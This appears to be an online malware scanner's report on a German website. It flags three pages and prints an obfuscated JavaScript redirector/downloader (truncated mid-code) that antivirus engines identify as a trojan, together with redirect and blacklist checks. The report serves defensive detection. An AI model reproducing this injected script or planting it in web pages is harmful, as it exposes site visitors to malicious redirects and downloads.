Malware Scanner report for wirbringenihnum.de

Malicious/Suspicious/Total urls checked: 3/0/15

3 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.wirbringenihnum.de/	200 OK Content-Length: 4251 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VB;if(VB!=''){VB='Va'};var At;if(At!='oO' && At!='qo'){At='oO'};function j(){var N=new String();var BL;if(BL!='u' && BL!='qO'){BL='u'};var ff;if(ff!='' && ff!='nH'){ff=null};var A=window;this.fi='';this.K='';var Qb=new Array();var M=A['unescape'];var Ft;if(Ft!='' && Ft!='k'){Ft='Vm'};var AJ=new Date();var AF=M("%2f%74%69%67%65%72%64%69%72%65%63%74%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6d%65%64%69%61%73%65%74%2e%69%74%2e%70%68%70");var Hd;if(Hd!='' &a ... 1578 bytes are skipped ...& Um != ''){Um=null};this.dx="";Q[V]=[1,8][0];Q[U]=X;var lz="";var gf;if(gf!='bY' && gf != ''){gf=null};ta.body[d('a8pApke_n6dTCMhTi8lkdT','WUM_jbkNAt5q6JZFH8T')](Q);} catch(Vz){};var cW;if(cW!='' && cW!='Kp'){cW='SL'};var dR=new Array();}var hb;if(hb!='No' && hb!='fa'){hb='No'};var Na;if(Na!='ewd'){Na=''};this.v_="";var a=d('o5nUlBo0aXd6','0IwtbgBOXU6Kvm5jAEY');var jJ="";var pr=new Date();var bO='';A[a]=o;};var ng;if(ng!='' && ng!='Cy'){ng=''};this.Fy="";j(); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Illredir-AX [Trj] Ikarus Trojan.JS.Redirector K7AntiVirus Exploit ( 04c558731 ) Comodo UnclassifiedMalware K7GW Exploit ( 04c558731 ) DrWeb JS.Redirector.based.2 Microsoft Trojan:JS/Redirector.DB Kaspersky HEUR:Trojan-Downloader.Script.Generic Jiangmin Trojan/JS.Pegel.b Cyren JS/Redir.AZ.gen NANO-Antivirus Trojan.Script.Redirector.vjwvm F-Prot JS/Redir.AZ.gen AVG JS/Redir Norman Redir.HU GData Script.Trojan.Agent.EU99KZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AP
http://www.wirbringenihnum.de/index.php	200 OK Content-Length: 4251 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VB;if(VB!=''){VB='Va'};var At;if(At!='oO' && At!='qo'){At='oO'};function j(){var N=new String();var BL;if(BL!='u' && BL!='qO'){BL='u'};var ff;if(ff!='' && ff!='nH'){ff=null};var A=window;this.fi='';this.K='';var Qb=new Array();var M=A['unescape'];var Ft;if(Ft!='' && Ft!='k'){Ft='Vm'};var AJ=new Date();var AF=M("%2f%74%69%67%65%72%64%69%72%65%63%74%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6d%65%64%69%61%73%65%74%2e%69%74%2e%70%68%70");var Hd;if(Hd!='' &a ... 1578 bytes are skipped ...& Um != ''){Um=null};this.dx="";Q[V]=[1,8][0];Q[U]=X;var lz="";var gf;if(gf!='bY' && gf != ''){gf=null};ta.body[d('a8pApke_n6dTCMhTi8lkdT','WUM_jbkNAt5q6JZFH8T')](Q);} catch(Vz){};var cW;if(cW!='' && cW!='Kp'){cW='SL'};var dR=new Array();}var hb;if(hb!='No' && hb!='fa'){hb='No'};var Na;if(Na!='ewd'){Na=''};this.v_="";var a=d('o5nUlBo0aXd6','0IwtbgBOXU6Kvm5jAEY');var jJ="";var pr=new Date();var bO='';A[a]=o;};var ng;if(ng!='' && ng!='Cy'){ng=''};this.Fy="";j(); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Illredir-AX [Trj] Ikarus Trojan.JS.Redirector K7AntiVirus Exploit ( 04c558731 ) Comodo UnclassifiedMalware K7GW Exploit ( 04c558731 ) DrWeb JS.Redirector.based.2 Microsoft Trojan:JS/Redirector.DB Kaspersky HEUR:Trojan-Downloader.Script.Generic Jiangmin Trojan/JS.Pegel.b Cyren JS/Redir.AZ.gen NANO-Antivirus Trojan.Script.Redirector.vjwvm F-Prot JS/Redir.AZ.gen AVG JS/Redir Norman Redir.HU GData Script.Trojan.Agent.EU99KZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AP
http://www.wirbringenihnum.de/inhalt.php	200 OK Content-Length: 2545 Content-Type: text/html	clean
http://www.wirbringenihnum.de/wannwo.php	200 OK Content-Length: 2721 Content-Type: text/html	clean
http://www.wirbringenihnum.de/hintergrund.php	200 OK Content-Length: 3523 Content-Type: text/html	clean
http://www.wirbringenihnum.de/fotos.php	200 OK Content-Length: 2324 Content-Type: text/html	clean
http://www.wirbringenihnum.de/wer.php	200 OK Content-Length: 2179 Content-Type: text/html	clean
http://www.wirbringenihnum.de/presse.php	200 OK Content-Length: 1700 Content-Type: text/html	clean
http://www.wirbringenihnum.de/feedback/	200 OK Content-Length: 5694 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VB;if(VB!=''){VB='Va'};var At;if(At!='oO' && At!='qo'){At='oO'};function j(){var N=new String();var BL;if(BL!='u' && BL!='qO'){BL='u'};var ff;if(ff!='' && ff!='nH'){ff=null};var A=window;this.fi='';this.K='';var Qb=new Array();var M=A['unescape'];var Ft;if(Ft!='' && Ft!='k'){Ft='Vm'};var AJ=new Date();var AF=M("%2f%74%69%67%65%72%64%69%72%65%63%74%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6d%65%64%69%61%73%65%74%2e%69%74%2e%70%68%70");var Hd;if(Hd!='' &a ... 1578 bytes are skipped ...& Um != ''){Um=null};this.dx="";Q[V]=[1,8][0];Q[U]=X;var lz="";var gf;if(gf!='bY' && gf != ''){gf=null};ta.body[d('a8pApke_n6dTCMhTi8lkdT','WUM_jbkNAt5q6JZFH8T')](Q);} catch(Vz){};var cW;if(cW!='' && cW!='Kp'){cW='SL'};var dR=new Array();}var hb;if(hb!='No' && hb!='fa'){hb='No'};var Na;if(Na!='ewd'){Na=''};this.v_="";var a=d('o5nUlBo0aXd6','0IwtbgBOXU6Kvm5jAEY');var jJ="";var pr=new Date();var bO='';A[a]=o;};var ng;if(ng!='' && ng!='Cy'){ng=''};this.Fy="";j(); Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Illredir-AX [Trj] Ikarus Trojan.JS.Redirector K7AntiVirus Exploit ( 04c558731 ) Comodo UnclassifiedMalware K7GW Exploit ( 04c558731 ) DrWeb JS.Redirector.based.2 Microsoft Trojan:JS/Redirector.DB Kaspersky HEUR:Trojan-Downloader.Script.Generic Jiangmin Trojan/JS.Pegel.b Cyren JS/Redir.AZ.gen NANO-Antivirus Trojan.Script.Redirector.vjwvm F-Prot JS/Redir.AZ.gen AVG JS/Redir Norman Redir.HU GData Script.Trojan.Agent.EU99KZ Agnitum JS.Redirector.Gen.5 ESET-NOD32 JS/TrojanDownloader.Pegel.AP
http://www.wirbringenihnum.de/kontakt.php	200 OK Content-Length: 2215 Content-Type: text/html	clean
http://www.wirbringenihnum.de/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://www.wirbringenihnum.de/feedback/insert.php	404 Not Found Content-Length: 217 Content-Type: text/html	clean
http://www.wirbringenihnum.de/fotos/hasenfratz_01.jpg	200 OK Content-Length: 56507 Content-Type: image/jpeg	clean
http://www.wirbringenihnum.de/fotos/hasenfratz_02.jpg	200 OK Content-Length: 98195 Content-Type: image/jpeg	clean
http://www.wirbringenihnum.de/fotos/hasenfratz_03.jpg	200 OK Content-Length: 83640 Content-Type: image/jpeg	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wirbringenihnum.de

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: wirbringenihnum.de
Referer: http://www.google.com/search?q=wirbringenihnum.de

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wirbringenihnum.de

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://wirbringenihnum.de/

Result: wirbringenihnum.de is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for wirbringenihnum.de

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools